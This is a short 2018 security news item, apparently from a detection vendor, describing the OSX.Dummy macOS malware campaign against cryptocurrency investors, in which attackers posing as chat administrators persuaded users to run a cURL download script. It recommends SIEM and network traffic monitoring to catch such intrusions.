Delaware, USA – July 3, 2018 – At the end of June, researchers reported the campaign targeted MacOS users. Adversaries used the new malware dubbed OSX.Dummy, which can bypass the Gatekeeper and allows adversaries to remotely execute commands on the infected system. Despite rising number of MacOS malware, only a few of them pose a serious threat, so the emergence of an effectively functioning sample attracts attention. OSX.Dummy much less advanced than malware for Windows systems, it has enormous file size and the campaign aimed at cryptocurrency investors. Attackers pretend to be administrators in Slack and Discord chats related to cryptocurrencies and convince users to run a malicious script that uses cURL utility to download and run OSX.Dummy. Downloading and running malware via terminal commands allows bypassing Gatekeeper and using a malicious file of almost 34 megabytes without causing suspicion. Then OSX.Dummy gains persistence on the infected system and tries to connect to the command and control server, in case of success, attackers can execute any code as a root user.
Even simple tools used by experienced attackers can lead to data exfiltration or compromising of the organization’s network. You can use your SIEM and Netflow Security Monitor to detect data breach attempts and suspicious spikes of network traffic.